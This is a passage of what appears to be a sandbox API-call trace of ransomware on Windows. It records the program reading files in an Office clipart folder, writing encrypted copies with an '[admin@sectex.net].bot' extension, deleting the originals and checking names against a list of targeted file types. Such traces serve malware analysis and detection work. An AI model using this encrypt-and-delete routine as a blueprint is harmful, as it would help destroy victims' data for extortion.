	[0140.987] GetLastError () returned 0x0
	[0140.987] ReadFile (in: hFile=0x3b8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x13c2, lpOverlapped=0x0) returned 1
	[0140.996] WriteFile (in: hFile=0x3b4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x13d0, lpOverlapped=0x0) returned 1
	[0140.997] ReadFile (in: hFile=0x3b8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.997] WriteFile (in: hFile=0x3b4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.997] SetEndOfFile (hFile=0x3b4) returned 1
	[0141.001] CloseHandle (hObject=0x3b4) returned 1
	[0141.001] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.001] SetEndOfFile (hFile=0x3b8) returned 1
	[0141.007] CloseHandle (hObject=0x3b8) returned 1
	[0141.007] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.008] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\schol_02.mid")) returned 1
	[0141.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63
	[0141.008] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63
	[0141.008] lstrlenW (lpString=".doc") returned 4
	[0141.008] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0141.008] lstrlenW (lpString=".docx") returned 5
	[0141.008] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1
	[0141.008] lstrlenW (lpString=".pdf") returned 4
	[0141.009] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0141.009] lstrlenW (lpString=".xls") returned 4
	[0141.009] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0141.009] lstrlenW (lpString=".xlsx") returned 5
	[0141.009] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1
	[0141.009] lstrlenW (lpString=".ppt") returned 4
	[0141.009] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0141.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63
	[0141.009] lstrlenW (lpString=".zip") returned 4
	[0141.009] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0141.009] lstrlenW (lpString=".rar") returned 4
	[0141.009] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0141.009] lstrlenW (lpString=".bz2") returned 4
	[0141.009] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0141.009] lstrlenW (lpString=".7z") returned 3
	[0141.009] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0141.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63
	[0141.009] lstrlenW (lpString=".dbf") returned 4
	[0141.009] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0141.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63
	[0141.009] lstrlenW (lpString=".1cd") returned 4
	[0141.009] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0141.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63
	[0141.009] lstrlenW (lpString=".jpg") returned 4
	[0141.009] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0141.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63
	[0141.009] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63
	[0141.009] lstrlenW (lpString=".doc") returned 4
	[0141.009] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0141.009] lstrlenW (lpString=".docx") returned 5
	[0141.009] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1
	[0141.010] lstrlenW (lpString=".pdf") returned 4
	[0141.010] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0141.010] lstrlenW (lpString=".xls") returned 4
	[0141.010] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0141.010] lstrlenW (lpString=".xlsx") returned 5
	[0141.010] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1
	[0141.010] lstrlenW (lpString=".ppt") returned 4
	[0141.010] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0141.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63
	[0141.010] lstrlenW (lpString=".zip") returned 4
	[0141.010] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0141.010] lstrlenW (lpString=".rar") returned 4
	[0141.010] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0141.010] lstrlenW (lpString=".bz2") returned 4
	[0141.010] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0141.010] lstrlenW (lpString=".7z") returned 3
	[0141.010] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0141.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63
	[0141.010] lstrlenW (lpString=".dbf") returned 4
	[0141.010] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0141.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63
	[0141.010] lstrlenW (lpString=".1cd") returned 4
	[0141.010] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0141.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63
	[0141.010] lstrlenW (lpString=".jpg") returned 4
	[0141.010] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0141.010] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0141.010] lstrlenW (lpString="URBAN_01.MID") returned 12
	[0141.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0141.011] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=13358) returned 1
	[0141.011] CloseHandle (hObject=0x3b8) returned 1
	[0141.011] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid")) returned 0x20
	[0141.011] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.011] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0141.011] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.011] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.012] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0141.012] GetLastError () returned 0x0
	[0141.012] ReadFile (in: hFile=0x3b8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x342e, lpOverlapped=0x0) returned 1
	[0141.014] WriteFile (in: hFile=0x3a8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x3430, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x3430, lpOverlapped=0x0) returned 1
	[0141.015] ReadFile (in: hFile=0x3b8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.015] WriteFile (in: hFile=0x3a8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.015] SetEndOfFile (hFile=0x3a8) returned 1
	[0141.015] CloseHandle (hObject=0x3a8) returned 1
	[0141.016] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.016] SetEndOfFile (hFile=0x3b8) returned 1
	[0141.018] CloseHandle (hObject=0x3b8) returned 1
	[0141.019] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.019] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\urban_01.mid")) returned 1
	[0141.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63
	[0141.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63
	[0141.019] lstrlenW (lpString=".doc") returned 4
	[0141.019] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0141.020] lstrlenW (lpString=".docx") returned 5
	[0141.020] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0141.020] lstrlenW (lpString=".pdf") returned 4
	[0141.020] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0141.020] lstrlenW (lpString=".xls") returned 4
	[0141.020] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0141.020] lstrlenW (lpString=".xlsx") returned 5
	[0141.020] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0141.020] lstrlenW (lpString=".ppt") returned 4
	[0141.020] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0141.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63
	[0141.020] lstrlenW (lpString=".zip") returned 4
	[0141.020] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0141.020] lstrlenW (lpString=".rar") returned 4
	[0141.020] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0141.020] lstrlenW (lpString=".bz2") returned 4
	[0141.020] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0141.020] lstrlenW (lpString=".7z") returned 3
	[0141.020] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0141.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63
	[0141.020] lstrlenW (lpString=".dbf") returned 4
	[0141.020] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0141.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63
	[0141.020] lstrlenW (lpString=".1cd") returned 4
	[0141.020] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0141.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63
	[0141.020] lstrlenW (lpString=".jpg") returned 4
	[0141.020] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0141.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63
	[0141.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63
	[0141.020] lstrlenW (lpString=".doc") returned 4
	[0141.020] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0141.020] lstrlenW (lpString=".docx") returned 5
	[0141.021] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0141.021] lstrlenW (lpString=".pdf") returned 4
	[0141.021] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0141.021] lstrlenW (lpString=".xls") returned 4
	[0141.021] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0141.021] lstrlenW (lpString=".xlsx") returned 5
	[0141.021] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0141.021] lstrlenW (lpString=".ppt") returned 4
	[0141.021] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0141.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63
	[0141.021] lstrlenW (lpString=".zip") returned 4
	[0141.021] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0141.021] lstrlenW (lpString=".rar") returned 4
	[0141.021] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0141.021] lstrlenW (lpString=".bz2") returned 4
	[0141.021] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0141.021] lstrlenW (lpString=".7z") returned 3
	[0141.021] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0141.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63
	[0141.021] lstrlenW (lpString=".dbf") returned 4
	[0141.021] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0141.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63
	[0141.021] lstrlenW (lpString=".1cd") returned 4
	[0141.021] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0141.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\URBAN_01.MID") returned 63
	[0141.021] lstrlenW (lpString=".jpg") returned 4
	[0141.021] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0141.021] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0141.021] lstrlenW (lpString="VCTRN_01.MID") returned 12
	[0141.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\vctrn_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0141.023] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=4961) returned 1
	[0141.023] CloseHandle (hObject=0x3b8) returned 1
	[0141.023] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\vctrn_01.mid")) returned 0x20
	[0141.023] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\vctrn_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\vctrn_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0141.023] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.023] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\vctrn_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0141.024] GetLastError () returned 0x0
	[0141.024] ReadFile (in: hFile=0x3b8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x1361, lpOverlapped=0x0) returned 1
	[0141.025] WriteFile (in: hFile=0x3a8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x1370, lpOverlapped=0x0) returned 1
	[0141.026] ReadFile (in: hFile=0x3b8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.026] WriteFile (in: hFile=0x3a8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.027] SetEndOfFile (hFile=0x3a8) returned 1
	[0141.027] CloseHandle (hObject=0x3a8) returned 1
	[0141.027] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.027] SetEndOfFile (hFile=0x3b8) returned 1
	[0141.029] CloseHandle (hObject=0x3b8) returned 1
	[0141.029] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.029] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\vctrn_01.mid")) returned 1
	[0141.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63
	[0141.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63
	[0141.030] lstrlenW (lpString=".doc") returned 4
	[0141.030] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0141.030] lstrlenW (lpString=".docx") returned 5
	[0141.030] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0141.030] lstrlenW (lpString=".pdf") returned 4
	[0141.030] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0141.030] lstrlenW (lpString=".xls") returned 4
	[0141.030] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0141.030] lstrlenW (lpString=".xlsx") returned 5
	[0141.030] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0141.030] lstrlenW (lpString=".ppt") returned 4
	[0141.030] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0141.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63
	[0141.030] lstrlenW (lpString=".zip") returned 4
	[0141.030] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0141.030] lstrlenW (lpString=".rar") returned 4
	[0141.030] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0141.030] lstrlenW (lpString=".bz2") returned 4
	[0141.030] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0141.030] lstrlenW (lpString=".7z") returned 3
	[0141.030] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0141.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63
	[0141.030] lstrlenW (lpString=".dbf") returned 4
	[0141.030] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0141.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63
	[0141.030] lstrlenW (lpString=".1cd") returned 4
	[0141.030] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0141.030] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63
	[0141.030] lstrlenW (lpString=".jpg") returned 4
	[0141.030] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0141.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63
	[0141.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63
	[0141.031] lstrlenW (lpString=".doc") returned 4
	[0141.031] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0141.031] lstrlenW (lpString=".docx") returned 5
	[0141.031] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0141.031] lstrlenW (lpString=".pdf") returned 4
	[0141.031] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0141.031] lstrlenW (lpString=".xls") returned 4
	[0141.031] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0141.031] lstrlenW (lpString=".xlsx") returned 5
	[0141.031] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0141.031] lstrlenW (lpString=".ppt") returned 4
	[0141.031] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0141.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63
	[0141.031] lstrlenW (lpString=".zip") returned 4
	[0141.031] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0141.031] lstrlenW (lpString=".rar") returned 4
	[0141.031] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0141.031] lstrlenW (lpString=".bz2") returned 4
	[0141.031] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0141.031] lstrlenW (lpString=".7z") returned 3
	[0141.031] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0141.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63
	[0141.031] lstrlenW (lpString=".dbf") returned 4
	[0141.031] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0141.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63
	[0141.031] lstrlenW (lpString=".1cd") returned 4
	[0141.031] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0141.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63
	[0141.031] lstrlenW (lpString=".jpg") returned 4
	[0141.031] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0141.032] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0141.032] lstrlenW (lpString="WNTER_01.MID") returned 12
	[0141.032] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0141.033] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=6915) returned 1
	[0141.033] CloseHandle (hObject=0x3b8) returned 1
	[0141.033] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid")) returned 0x20
	[0141.033] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0141.033] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.033] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.034] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0141.034] GetLastError () returned 0x0
	[0141.034] ReadFile (in: hFile=0x3b8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x1b03, lpOverlapped=0x0) returned 1
